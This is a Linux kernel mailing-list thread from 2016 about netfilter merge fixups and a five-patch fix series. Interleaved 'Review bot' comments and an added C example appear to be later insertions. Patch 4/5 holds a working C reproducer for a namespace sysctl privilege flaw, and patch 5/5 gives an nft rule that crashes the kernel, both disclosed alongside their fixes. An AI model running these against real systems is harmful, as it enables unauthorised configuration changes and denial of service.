Re: [GIT] Networking
Hi Dave,

On Wed, 05 Oct 2016 22:56:12 -0400 (EDT) David Miller wrote:
>
> Yes, this is where the change got lost.

No worries.

> I have all of the fixups queued up in my net tree and will send in a pull
> request later.

Thanks.
--
Cheers,
Stephen Rothwell
--
To unsubscribe from this list: send the line "unsubscribe netfilter-devel" in
the body of a message to majord...@vger.kernel.org
More majordomo info at http://vger.kernel.org/majordomo-info.html
Re: [GIT] Networking
From: Stephen Rothwell
Date: Thu, 6 Oct 2016 13:51:52 +1100

> On Wed, 5 Oct 2016 19:14:21 -0700 Linus Torvalds
> wrote:
>>
>> On Wed, Oct 5, 2016 at 5:52 PM, Stephen Rothwell
>> wrote:
>> >
>> > Except that commit effectively moved that function from
>> > net/netfilter/nf_tables_netdev.c to
>> > include/net/netfilter/nf_tables_ipv4.h while commit c73c24849011
>> > ("netfilter: nf_tables_netdev: remove redundant ip_hdr assignment")
>> > removed the assignment in the original file (and has been in your tree
>> > since v4.8-rc7) and that is where I originally actually got a conflict.
>>
>> Oh, interesting. Why didn't I get the conflict there then?
>>
>> I'm guessing (but too lazy to actually look up the history), that
>> David ended up doing that merge and that ends up being why I never saw
>> a conflict.
>
> Yeah, commit b50afd203a5e ("Merge
> git://git.kernel.org/pub/scm/linux/kernel/git/davem/net") actually
> merges v4.8 into the net-next tree.

Yes, this is where the change got lost.

I have all of the fixups queued up in my net tree and will send in a pull
request later.
Re: [GIT] Networking
Hi Linus,

On Wed, 5 Oct 2016 19:14:21 -0700 Linus Torvalds wrote:
>
> On Wed, Oct 5, 2016 at 5:52 PM, Stephen Rothwell
> wrote:
> >
> > Except that commit effectively moved that function from
> > net/netfilter/nf_tables_netdev.c to
> > include/net/netfilter/nf_tables_ipv4.h while commit c73c24849011
> > ("netfilter: nf_tables_netdev: remove redundant ip_hdr assignment")
> > removed the assignment in the original file (and has been in your tree
> > since v4.8-rc7) and that is where I originally actually got a conflict.
>
> Oh, interesting. Why didn't I get the conflict there then?
>
> I'm guessing (but too lazy to actually look up the history), that
> David ended up doing that merge and that ends up being why I never saw
> a conflict.

Yeah, commit b50afd203a5e ("Merge
git://git.kernel.org/pub/scm/linux/kernel/git/davem/net") actually
merges v4.8 into the net-next tree.
--
Cheers,
Stephen Rothwell
Re: [GIT] Networking
On Wed, Oct 5, 2016 at 5:52 PM, Stephen Rothwell wrote:
>
> Except that commit effectively moved that function from
> net/netfilter/nf_tables_netdev.c to
> include/net/netfilter/nf_tables_ipv4.h while commit c73c24849011
> ("netfilter: nf_tables_netdev: remove redundant ip_hdr assignment")
> removed the assignment in the original file (and has been in your tree
> since v4.8-rc7) and that is where I originally actually got a conflict.

Oh, interesting. Why didn't I get the conflict there then?

I'm guessing (but too lazy to actually look up the history), that
David ended up doing that merge and that ends up being why I never saw
a conflict.

Linus
Re: [GIT] Networking
Hi Linus,

On Wed, 5 Oct 2016 15:37:17 -0700 Linus Torvalds wrote:
>
> On Wed, Oct 5, 2016 at 3:29 PM, Stephen Rothwell
> wrote:
> >
> > I have been carrying the following merge fix patch (for the merge of
> > the net-next tree with Linus' tree) for a while now which seems to have
> > got missed:
>
> Ugh. It doesn't seem to be a merge error, because that double iph
> assignment came from the original patch that introduced this function:
> commit ddc8b6027ad0 ("netfilter: introduce nft_set_pktinfo_{ipv4,
> ipv6}_validate()").

Except that commit effectively moved that function from
net/netfilter/nf_tables_netdev.c to
include/net/netfilter/nf_tables_ipv4.h while commit c73c24849011
("netfilter: nf_tables_netdev: remove redundant ip_hdr assignment")
removed the assignment in the original file (and has been in your tree
since v4.8-rc7) and that is where I originally actually got a conflict.

> So I wouldn't call it a merge error - it just looks like a bug in the
> network layer. So I'm not going to apply your patch even though it
> looks plausible to me, simply because it's outside my area of
> expertise.

No worries.
--
Cheers,
Stephen Rothwell
Re: [GIT] Networking
From: Pablo Neira Ayuso
Date: Thu, 6 Oct 2016 02:09:45 +0200

> On Wed, Oct 05, 2016 at 03:37:17PM -0700, Linus Torvalds wrote:
>> On Wed, Oct 5, 2016 at 3:29 PM, Stephen Rothwell
>> wrote:
>> >
>> > I have been carrying the following merge fix patch (for the merge of
>> > the net-next tree with Linus' tree) for a while now which seems to have
>> > got missed:
>>
>> Ugh. It doesn't seem to be a merge error, because that double iph
>> assignment came from the original patch that introduced this function:
>> commit ddc8b6027ad0 ("netfilter: introduce nft_set_pktinfo_{ipv4,
>> ipv6}_validate()").
>>
>> So I wouldn't call it a merge error - it just looks like a bug in the
>> network layer. So I'm not going to apply your patch even though it
>> looks plausible to me, simply because it's outside my area of
>> expertise.
>>
>> David? Pablo?
>
> This looks good, please take it so we speed up things.
>
> Acked-by: Pablo Neira Ayuso

Applied.
Re: [PATCH 0/5] Netfilter fixes for net-next
From: Pablo Neira Ayuso
Date: Thu, 6 Oct 2016 02:07:44 +0200

> This is a pull request to address fallout from previous nf-next pull
> request, only fixes going on here:
>
> 1) Address a potential null dereference in nf_unregister_net_hook()
>    when nf_hook_entry_head becomes NULL, from Aaron Conole.
>
> 2) Missing ifdef for CONFIG_NETFILTER_INGRESS, also from Aaron.
>
> 3) Fix linking problems in xt_hashlimit in x86_32, from Pai.
>
> 4) Fix permissions of nf_log sysctl from unprivileged netns, from
>    Jann Horn.
>
> 5) Fix possible divide by zero in nft_limit, from Liping Zhang.
>
> You can pull these changes from:
>
>   git://git.kernel.org/pub/scm/linux/kernel/git/pablo/nf-next.git

Pulled, thanks Pablo.
Re: [GIT] Networking
On Wed, Oct 05, 2016 at 03:37:17PM -0700, Linus Torvalds wrote:
> On Wed, Oct 5, 2016 at 3:29 PM, Stephen Rothwell
> wrote:
> >
> > I have been carrying the following merge fix patch (for the merge of
> > the net-next tree with Linus' tree) for a while now which seems to have
> > got missed:
>
> Ugh. It doesn't seem to be a merge error, because that double iph
> assignment came from the original patch that introduced this function:
> commit ddc8b6027ad0 ("netfilter: introduce nft_set_pktinfo_{ipv4,
> ipv6}_validate()").
>
> So I wouldn't call it a merge error - it just looks like a bug in the
> network layer. So I'm not going to apply your patch even though it
> looks plausible to me, simply because it's outside my area of
> expertise.
>
> David? Pablo?

This looks good, please take it so we speed up things.

Acked-by: Pablo Neira Ayuso

Thanks!

P.S: Sorry for not addressing this any sooner; traveling overhead, a
conference and an unstable wifi connection have been a problem here.
[PATCH 5/5] netfilter: nft_limit: fix divided by zero panic
From: Liping Zhang

After I input the following nftables rule, a panic happened on my system:

  # nft add rule filter OUTPUT limit rate 0xf bytes/second

  divide error: [#1] SMP
  [ ... ]
  RIP: 0010:[] [] nft_limit_pkt_bytes_eval+0x2e/0xa0 [nft_limit]
  Call Trace:
  [] nft_do_chain+0xfb/0x4e0 [nf_tables]
  [] ? nf_nat_setup_info+0x96/0x480 [nf_nat]
  [] ? ipt_do_table+0x327/0x610
  [] ? __nf_nat_alloc_null_binding+0x57/0x80 [nf_nat]
  [] nft_ipv4_output+0xaf/0xd0 [nf_tables_ipv4]
  [] nf_iterate+0x62/0x80
  [] nf_hook_slow+0x73/0xd0
  [] __ip_local_out+0xcd/0xe0
  [] ? ip_forward_options+0x1b0/0x1b0
  [] ip_local_out+0x1c/0x40

This is because divisor is 64-bit, but we treat it as a 32-bit integer,
then 0xf becomes zero, i.e. divisor becomes 0.

Signed-off-by: Liping Zhang
Signed-off-by: Pablo Neira Ayuso
---
 net/netfilter/nft_limit.c | 4 ++--
 1 file changed, 2 insertions(+), 2 deletions(-)

diff --git a/net/netfilter/nft_limit.c b/net/netfilter/nft_limit.c index 070b98938e02..c6baf412236d 100644 --- a/net/netfilter/nft_limit.c +++ b/net/netfilter/nft_limit.c @@ -145,7 +145,7 @@ static int nft_limit_pkts_init(const struct nft_ctx *ctx, if (err < 0) return err; - priv->cost = div_u64(priv->limit.nsecs, priv->limit.rate); + priv->cost = div64_u64(priv->limit.nsecs, priv->limit.rate); return 0; } @@ -170,7 +170,7 @@ static void nft_limit_pkt_bytes_eval(const struct nft_expr *expr, const struct nft_pktinfo *pkt) { struct nft_limit *priv = nft_expr_priv(expr); - u64 cost = div_u64(priv->nsecs * pkt->skb->len, priv->rate); + u64 cost = div64_u64(priv->nsecs * pkt->skb->len, priv->rate); if (nft_limit_eval(priv, cost)) regs->verdict.code = NFT_BREAK; -- 2.1.4
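Review bot: the init hunk at `priv->cost = div64_u64(priv->limit.nsecs, priv->limit.rate);` stops the divisor from being narrowed to 32 bits, but a rate that is literally zero would still reach this division; unless the attribute parsing above the hunk already rejects `rate == 0`, add an explicit check that returns an error before computing the cost, so a bad rule is refused at insert time instead of trapping in the packet path.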
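Review bot: in the nft_limit_pkt_bytes_eval() hunk, `priv->nsecs * pkt->skb->len` is still a u64 product formed before the division; the change only widens the divisor. The commit message should state (or init should enforce) that nsecs is bounded so nsecs times the largest skb length cannot wrap, since a wrapped product yields a silently too-small cost rather than a visible crash.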
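Added example, not code from the patch or from the kernel: it models why a 64-bit rate silently becomes a zero divisor when it is passed to a helper whose divisor parameter is 32 bits wide (the narrowing the nft_limit commit message above describes; the kernel's div_u64() takes a u32 divisor, div64_u64() a u64), and shows the configuration-time check a hardened version applies. The model_* helpers, the NSEC_PER_SEC define and the sample rate are constructed stand-ins.

```c
#include <stdbool.h>
#include <stdint.h>
#include <stdio.h>

/* Constructed stand-in for a one-second unit, as nft_limit stores it. */
#define NSEC_PER_SEC 1000000000ULL

/* Model of the kernel's div_u64(): the divisor parameter is a u32, so a
 * 64-bit rate passed here is narrowed on the call. Hypothetical name. */
static uint64_t model_div_u64(uint64_t dividend, uint32_t divisor)
{
    return dividend / divisor;
}

/* Model of div64_u64(): both operands keep their full 64 bits. */
static uint64_t model_div64_u64(uint64_t dividend, uint64_t divisor)
{
    return dividend / divisor;
}

/* True when a 64-bit rate would be narrowed to zero by a u32 divisor,
 * i.e. the value is non-zero but its low 32 bits are all zero. */
bool rate_truncates_to_zero(uint64_t rate)
{
    return rate != 0 && (uint32_t)rate == 0;
}

/* Cost computed the way the pre-fix code did: nsecs / rate through the
 * u32-divisor helper. Returns false instead of trapping when the
 * narrowing yields zero, which is exactly the kernel's divide error. */
bool cost_with_narrow_divisor(uint64_t nsecs, uint64_t rate, uint64_t *cost)
{
    uint32_t narrowed = (uint32_t)rate;  /* what a u32 parameter does */
    if (narrowed == 0)
        return false;
    *cost = model_div_u64(nsecs, narrowed);
    return true;
}

/* Hardened version: reject a zero rate or unit at configuration time
 * (the control path, where an error can be reported to the rule author)
 * and divide at full width so no narrowing happens in the datapath. */
int limit_init_checked(uint64_t nsecs, uint64_t rate, uint64_t *cost)
{
    if (rate == 0 || nsecs == 0)
        return -1;
    *cost = model_div64_u64(nsecs, rate);
    return 0;
}

int main(void)
{
    /* Constructed rate whose low 32 bits are zero: 0xf followed by eight
     * hex zeros, the shape of value the commit message describes. */
    uint64_t rate = 0xf00000000ULL;
    uint64_t cost = 0;

    printf("rate 0x%llx truncates to zero: %s\n",
           (unsigned long long)rate,
           rate_truncates_to_zero(rate) ? "yes" : "no");
    if (!cost_with_narrow_divisor(NSEC_PER_SEC, rate, &cost))
        printf("u32 divisor: would divide by zero\n");
    if (limit_init_checked(NSEC_PER_SEC, rate, &cost) == 0)
        printf("u64 divisor: cost %llu ns per byte\n",
               (unsigned long long)cost);
    return 0;
}
```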
[PATCH 4/5] netfilter: fix namespace handling in nf_log_proc_dostring
From: Jann Horn

nf_log_proc_dostring() used current's network namespace instead of the one
corresponding to the sysctl file the write was performed on. Because the
permission check happens at open time and the nf_log files in namespaces
are accessible for the namespace owner, this can be abused by an
unprivileged user to effectively write to the init namespace's nf_log
sysctls.

Stash the "struct net *" in extra2 - data and extra1 are already used.

Repro code:

#define _GNU_SOURCE #include #include #include #include #include #include #include #include #include #include char child_stack[100]; uid_t outer_uid; gid_t outer_gid; int stolen_fd = -1; void writefile(char *path, char *buf) { int fd = open(path, O_WRONLY); if (fd == -1) err(1, "unable to open thing"); if (write(fd, buf, strlen(buf)) != strlen(buf)) err(1, "unable to write thing"); close(fd); } int child_fn(void *p_) { if (mount("proc", "/proc", "proc", MS_NOSUID|MS_NODEV|MS_NOEXEC, NULL)) err(1, "mount"); /* Yes, we need to set the maps for the net sysctls to recognize us * as namespace root. */ char buf[1000]; sprintf(buf, "0 %d 1\n", (int)outer_uid); writefile("/proc/1/uid_map", buf); writefile("/proc/1/setgroups", "deny"); sprintf(buf, "0 %d 1\n", (int)outer_gid); writefile("/proc/1/gid_map", buf); stolen_fd = open("/proc/sys/net/netfilter/nf_log/2", O_WRONLY); if (stolen_fd == -1) err(1, "open nf_log"); return 0; } int main(void) { outer_uid = getuid(); outer_gid = getgid(); int child = clone(child_fn, child_stack + sizeof(child_stack), CLONE_FILES|CLONE_NEWNET|CLONE_NEWNS|CLONE_NEWPID |CLONE_NEWUSER|CLONE_VM|SIGCHLD, NULL); if (child == -1) err(1, "clone"); int status; if (wait() != child) err(1, "wait"); if (!WIFEXITED(status) || WEXITSTATUS(status) != 0) errx(1, "child exit status bad"); char *data = "NONE"; if (write(stolen_fd, data, strlen(data)) != strlen(data)) err(1, "write"); return 0; }

Repro:

  $ gcc -Wall -o attack attack.c -std=gnu99
  $ cat /proc/sys/net/netfilter/nf_log/2
  nf_log_ipv4
  $ ./attack
  $ cat /proc/sys/net/netfilter/nf_log/2
  NONE

Because this looks like an issue with very low severity, I'm sending it to
the public list directly.

Signed-off-by: Jann Horn
Signed-off-by: Pablo Neira Ayuso
---
 net/netfilter/nf_log.c | 6 --
 1 file changed, 4 insertions(+), 2 deletions(-)

diff --git a/net/netfilter/nf_log.c b/net/netfilter/nf_log.c index 30a17d649a83..3dca90dc24ad 100644 --- a/net/netfilter/nf_log.c +++ b/net/netfilter/nf_log.c @@ -422,7 +422,7 @@ static int nf_log_proc_dostring(struct ctl_table *table, int write, char buf[NFLOGGER_NAME_LEN]; int r = 0; int tindex = (unsigned long)table->extra1; - struct net *net = current->nsproxy->net_ns; + struct net *net = table->extra2; if (write) { struct ctl_table tmp = *table; @@ -476,7 +476,6 @@ static int netfilter_log_sysctl_init(struct net *net) 3, "%d", i); nf_log_sysctl_table[i].procname = nf_log_sysctl_fnames[i]; - nf_log_sysctl_table[i].data = NULL; nf_log_sysctl_table[i].maxlen = NFLOGGER_NAME_LEN; nf_log_sysctl_table[i].mode = 0644; nf_log_sysctl_table[i].proc_handler = 
@@ -486,6 +485,9 @@ static int netfilter_log_sysctl_init(struct net *net) } } + for (i = NFPROTO_UNSPEC; i < NFPROTO_NUMPROTO; i++) + table[i].extra2 = net; + net->nf.nf_log_dir_header = register_net_sysctl(net, "net/netfilter/nf_log", table); -- 2.1.4
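Review bot: the removal of `nf_log_sysctl_table[i].data = NULL;` in the netfilter_log_sysctl_init() hunk at -476 is not mentioned in the commit message, which only describes stashing the net pointer in extra2; a sentence on why the data field no longer needs resetting there would help anyone bisecting this later.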
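Review bot: the new loop `table[i].extra2 = net;` in the -486 hunk is now the only thing tying a sysctl file to its namespace, so the permission boundary depends on it running for every entry the handler can be reached through. A short comment above the loop saying that nf_log_proc_dostring() takes the namespace from extra2 rather than from current would make that dependency visible, and the handler could defensively bail out with an error if extra2 is NULL instead of dereferencing it.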
[PATCH 3/5] netfilter: xt_hashlimit: Fix link error in 32bit arch because of 64bit division
From: Vishwanath Pai

Division of 64bit integers will cause linker error undefined reference to
`__udivdi3'. Fix this by replacing divisions with div64_64

Fixes: 11d5f15723c9 ("netfilter: xt_hashlimit: Create revision 2 to ...")
Signed-off-by: Vishwanath Pai
Acked-by: Maciej Żenczykowski
Signed-off-by: Pablo Neira Ayuso
---
 net/netfilter/xt_hashlimit.c | 15 ---
 1 file changed, 8 insertions(+), 7 deletions(-)

diff --git a/net/netfilter/xt_hashlimit.c b/net/netfilter/xt_hashlimit.c index 44a095ecc7b7..2fab0c65aa94 100644 --- a/net/netfilter/xt_hashlimit.c +++ b/net/netfilter/xt_hashlimit.c @@ -467,17 +467,18 @@ static u64 user2credits(u64 user, int revision) /* If multiplying would overflow... */ if (user > 0x / (HZ*CREDITS_PER_JIFFY_v1)) /* Divide first. */ - return (user / XT_HASHLIMIT_SCALE) *\ - HZ * CREDITS_PER_JIFFY_v1; + return div64_u64(user, XT_HASHLIMIT_SCALE) + * HZ * CREDITS_PER_JIFFY_v1; - return (user * HZ * CREDITS_PER_JIFFY_v1) \ - / XT_HASHLIMIT_SCALE; + return div64_u64(user * HZ * CREDITS_PER_JIFFY_v1, +XT_HASHLIMIT_SCALE); } else { if (user > 0x / (HZ*CREDITS_PER_JIFFY)) - return (user / XT_HASHLIMIT_SCALE_v2) *\ - HZ * CREDITS_PER_JIFFY; + return div64_u64(user, XT_HASHLIMIT_SCALE_v2) + * HZ * CREDITS_PER_JIFFY; - return (user * HZ * CREDITS_PER_JIFFY) / XT_HASHLIMIT_SCALE_v2; + return div64_u64(user * HZ * CREDITS_PER_JIFFY, +XT_HASHLIMIT_SCALE_v2); } } -- 2.1.4
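Review bot: every division in the user2credits() hunk now goes through div64_u64() even though the divisor is a compile-time scale constant (XT_HASHLIMIT_SCALE or XT_HASHLIMIT_SCALE_v2); if those constants fit in 32 bits, div_u64() (u64 dividend, u32 divisor) resolves the `__udivdi3` link error just as well and takes the cheaper path on 32-bit targets, so either use it or say in the message why the full 64-bit divisor variant was chosen. The commit message also names the helper as div64_64 while the code uses div64_u64; please make them agree.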
[PATCH 1/5] netfilter: Fix potential null pointer dereference
From: Aaron Conole

It's possible for nf_hook_entry_head to return NULL. If two
nf_unregister_net_hook calls happen simultaneously with a single hook
entry in the list, both will enter the nf_hook_mutex critical section.
The first will successfully delete the head, but the second will see
this NULL pointer and attempt to dereference.

This fix ensures that no null pointer dereference could occur when such
a condition happens.

Fixes: e3b37f11e6e4 ("netfilter: replace list_head with single linked list")
Signed-off-by: Aaron Conole
Signed-off-by: Pablo Neira Ayuso
---
 net/netfilter/core.c | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/net/netfilter/core.c b/net/netfilter/core.c index fa6715db4581..e3f68a786afe 100644 --- a/net/netfilter/core.c +++ b/net/netfilter/core.c @@ -160,7 +160,7 @@ void nf_unregister_net_hook(struct net *net, const struct nf_hook_ops *reg) mutex_lock(_hook_mutex); hooks_entry = nf_hook_entry_head(net, reg); - if (hooks_entry->orig_ops == reg) { + if (hooks_entry && hooks_entry->orig_ops == reg) { nf_set_hooks_head(net, reg, nf_entry_dereference(hooks_entry->next)); goto unlock; -- 2.1.4
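Review bot: the guard `if (hooks_entry && hooks_entry->orig_ops == reg)` avoids the dereference on the head, but on the NULL path the `goto unlock` is not taken and control continues into whatever list walk follows the hunk; please confirm that code also tolerates hooks_entry == NULL. Since the commit message describes the trigger as the same hook being unregistered twice, a WARN_ON_ONCE on that path would surface the caller bug instead of silently ignoring it.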
[PATCH 2/5] netfilter: accommodate different kconfig in nf_set_hooks_head
From: Aaron Conole

When CONFIG_NETFILTER_INGRESS is unset (or no), we need to handle
the request for registration properly by dropping the hook. This
releases the entry during the set.

Fixes: e3b37f11e6e4 ("netfilter: replace list_head with single linked list")
Signed-off-by: Aaron Conole
Signed-off-by: Pablo Neira Ayuso
---
 net/netfilter/core.c | 15 +++
 1 file changed, 11 insertions(+), 4 deletions(-)

diff --git a/net/netfilter/core.c b/net/netfilter/core.c index e3f68a786afe..c9d90eb64046 100644 --- a/net/netfilter/core.c +++ b/net/netfilter/core.c @@ -90,10 +90,12 @@ static void nf_set_hooks_head(struct net *net, const struct nf_hook_ops *reg, { switch (reg->pf) { case NFPROTO_NETDEV: +#ifdef CONFIG_NETFILTER_INGRESS /* We already checked in nf_register_net_hook() that this is * used from ingress. */ rcu_assign_pointer(reg->dev->nf_hooks_ingress, entry); +#endif break; default: rcu_assign_pointer(net->nf.hooks[reg->pf][reg->hooknum], @@ -107,10 +109,15 @@ int nf_register_net_hook(struct net *net, const struct nf_hook_ops *reg) struct nf_hook_entry *hooks_entry; struct nf_hook_entry *entry; - if (reg->pf == NFPROTO_NETDEV && - (reg->hooknum != NF_NETDEV_INGRESS || -!reg->dev || dev_net(reg->dev) != net)) - return -EINVAL; + if (reg->pf == NFPROTO_NETDEV) { +#ifndef CONFIG_NETFILTER_INGRESS + if (reg->hooknum == NF_NETDEV_INGRESS) + return -EOPNOTSUPP; +#endif + if (reg->hooknum != NF_NETDEV_INGRESS || + !reg->dev || dev_net(reg->dev) != net) + return -EINVAL; + } entry = kmalloc(sizeof(*entry), GFP_KERNEL); if (!entry) -- 2.1.4
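Review bot: the commit message says the change "releases the entry during the set", but the nf_set_hooks_head() hunk only wraps `rcu_assign_pointer(reg->dev->nf_hooks_ingress, entry);` in `#ifdef CONFIG_NETFILTER_INGRESS`; nothing is freed there, and an entry is kept from reaching this function on such kernels by the -EOPNOTSUPP return added to nf_register_net_hook(). Reword the message so it describes the two hunks as they actually work.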
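Review bot: in the nf_register_net_hook() hunk the `#ifndef CONFIG_NETFILTER_INGRESS` check runs before the `!reg->dev || dev_net(reg->dev) != net` validation, so a malformed ingress registration on a kernel without ingress support now returns -EOPNOTSUPP where it previously returned -EINVAL; that is acceptable, but a one-line comment noting that the returned error depends on kconfig would save a future reader from wondering whether the ordering was deliberate.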
[PATCH 0/5] Netfilter fixes for net-next
Hi David,

This is a pull request to address fallout from previous nf-next pull
request, only fixes going on here:

1) Address a potential null dereference in nf_unregister_net_hook()
   when nf_hook_entry_head becomes NULL, from Aaron Conole.

2) Missing ifdef for CONFIG_NETFILTER_INGRESS, also from Aaron.

3) Fix linking problems in xt_hashlimit in x86_32, from Pai.

4) Fix permissions of nf_log sysctl from unprivileged netns, from
   Jann Horn.

5) Fix possible divide by zero in nft_limit, from Liping Zhang.

You can pull these changes from:

  git://git.kernel.org/pub/scm/linux/kernel/git/pablo/nf-next.git

P.S: Sorry for not addressing this any sooner, a mixture of traveling
overhead, a conference and problems with the wifi connection has prevented
me from doing this any sooner.

Thanks!

The following changes since commit 803783849fed11e38a30f31932c02c815520da70:

  mlx5: Add ndo_poll_controller() implementation (2016-09-30 02:11:16 -0400)

are available in the git repository at:

  git://git.kernel.org/pub/scm/linux/kernel/git/pablo/nf-next.git HEAD

for you to fetch changes up to 2fa46c130193300f06e68727ae98ec9f6184cad4:

  netfilter: nft_limit: fix divided by zero panic (2016-10-04 08:59:03 +0200)

Aaron Conole (2):
      netfilter: Fix potential null pointer dereference
      netfilter: accommodate different kconfig in nf_set_hooks_head

Jann Horn (1):
      netfilter: fix namespace handling in nf_log_proc_dostring

Liping Zhang (1):
      netfilter: nft_limit: fix divided by zero panic

Vishwanath Pai (1):
      netfilter: xt_hashlimit: Fix link error in 32bit arch because of 64bit division

 net/netfilter/core.c         | 17 -
 net/netfilter/nf_log.c       |  6 --
 net/netfilter/nft_limit.c    |  4 ++--
 net/netfilter/xt_hashlimit.c | 15 ---
 4 files changed, 26 insertions(+), 16 deletions(-)
Re: [GIT] Networking
On Wed, Oct 5, 2016 at 3:29 PM, Stephen Rothwell wrote:
>
> I have been carrying the following merge fix patch (for the merge of
> the net-next tree with Linus' tree) for a while now which seems to have
> got missed:

Ugh. It doesn't seem to be a merge error, because that double iph
assignment came from the original patch that introduced this function:
commit ddc8b6027ad0 ("netfilter: introduce nft_set_pktinfo_{ipv4,
ipv6}_validate()").

So I wouldn't call it a merge error - it just looks like a bug in the
network layer. So I'm not going to apply your patch even though it
looks plausible to me, simply because it's outside my area of
expertise.

David? Pablo?

Linus
Re: [GIT] Networking
Hi Linus, Dave,

On Wed, 05 Oct 2016 01:44:37 -0400 (EDT) David Miller wrote:
>

I have been carrying the following merge fix patch (for the merge of
the net-next tree with Linus' tree) for a while now which seems to have
got missed:

From: Stephen Rothwell
Date: Tue, 13 Sep 2016 10:08:58 +1000
Subject: [PATCH] netfilter: merge fixup for "nf_tables_netdev: remove redundant ip_hdr assignment"

Signed-off-by: Stephen Rothwell
---
 include/net/netfilter/nf_tables_ipv4.h | 1 -
 1 file changed, 1 deletion(-)

diff --git a/include/net/netfilter/nf_tables_ipv4.h b/include/net/netfilter/nf_tables_ipv4.h index 968f00b82fb5..25e33aee91e7 100644 --- a/include/net/netfilter/nf_tables_ipv4.h +++ b/include/net/netfilter/nf_tables_ipv4.h @@ -33,7 +33,6 @@ __nft_set_pktinfo_ipv4_validate(struct nft_pktinfo *pkt, if (!iph) return -1; - iph = ip_hdr(skb); if (iph->ihl < 5 || iph->version != 4) return -1; -- 2.8.1
--
Cheers,
Stephen Rothwell
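Review bot: the dropped line `iph = ip_hdr(skb);` sat directly after `if (!iph) return -1;`, so the pointer that had just passed the NULL check was discarded before `iph->ihl` and `iph->version` were read; removing the reassignment is what makes that guard protect the dereference. Since the same double assignment was removed from net/netfilter/nf_tables_netdev.c by commit c73c24849011 while the function moved into this header, the fixup should reference that commit in its message so the history stays traceable.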
Re: error: 'struct net_device' has no member named 'nf_hooks_ingress'
On Wed, 2016-10-05 at 22:56 +0200, Michal Sojka wrote:
> this commit is now in mainline as
> e3b37f11e6e4e6b6f02cc762f182ce233d2c1c9d and it breaks my build:
>
> net/netfilter/core.c: In function 'nf_set_hooks_head':
> net/netfilter/core.c:96:3: error: 'struct net_device' has no member named
> 'nf_hooks_ingress'
>
> Are the fixes (see below) on the way to mainline too?

Yes, the fixes are already in nf tree and _will_ get pushed.

Pablo and David are attending netdev 1.2 in Tokyo and have obligations.

https://git.kernel.org/cgit/linux/kernel/git/pablo/nf-next.git/

Thanks.
error: 'struct net_device' has no member named 'nf_hooks_ingress'
Hi,

On Tue, Oct 04 2016, Sergey Senozhatsky wrote:
> On (09/27/16 19:03), Sergey Senozhatsky wrote:
>> Hello,
>>
>> On (09/27/16 16:40), Stephen Rothwell wrote:
>> >
>> > Changes since 20160923:
>> >
>>
>> seems that commit e3b37f11e6e4e6b6 ("netfilter: replace list_head with
>> single linked list") breaks the build on !CONFIG_NETFILTER_INGRESS systems
>> accessing ->nf_hooks_ingress

this commit is now in mainline as e3b37f11e6e4e6b6f02cc762f182ce233d2c1c9d
and it breaks my build:

net/netfilter/core.c: In function 'nf_set_hooks_head':
net/netfilter/core.c:96:3: error: 'struct net_device' has no member named 'nf_hooks_ingress'

Are the fixes (see below) on the way to mainline too?

Thanks.
-Michal

>>
>> static void nf_set_hooks_head(struct net *net, const struct nf_hook_ops *reg,
>>                               struct nf_hook_entry *entry)
>> {
>>        switch (reg->pf) {
>>        case NFPROTO_NETDEV:
>>                /* We already checked in nf_register_net_hook() that this is
>>                 * used from ingress.
>>                 */
>>                rcu_assign_pointer(reg->dev->nf_hooks_ingress, entry);
>>
>
>
> so I see two commits in linux-next now that fix the commit in question in
> two patches
>
> : commit 7816ec564ec40ae20bb7925f733a181cad0cc491 ("netfilter: accommodate
> : different kconfig in nf_set_hooks_head")
> :
> :    When CONFIG_NETFILTER_INGRESS is unset (or no), we need to handle
> :    the request for registration properly by dropping the hook. This
> :    releases the entry during the set.
> :
> :    Fixes: e3b37f11e6e4 ("netfilter: replace list_head with single linked
> list")
>
> and
>
> : commit 5119e4381a90fabd3442bde02707cbd9e5d7367a ("netfilter: Fix potential
> : null pointer dereference")
> :
> :    It's possible for nf_hook_entry_head to return NULL. If two
> :    nf_unregister_net_hook calls happen simultaneously with a single hook
> :    entry in the list, both will enter the nf_hook_mutex critical section.
> :    The first will successfully delete the head, but the second will see
> :    this NULL pointer and attempt to dereference.
> :
> :    This fix ensures that no null pointer dereference could occur when such
> :    a condition happens.
> :
> :    Fixes: e3b37f11e6e4 ("netfilter: replace list_head with single linked
> list")
>
>
> do you guys plan to fold those into "e3b37f11e6e4" (a preferred way)
> or will send it out as 3 separate patches (um, why) ?
>
> -ss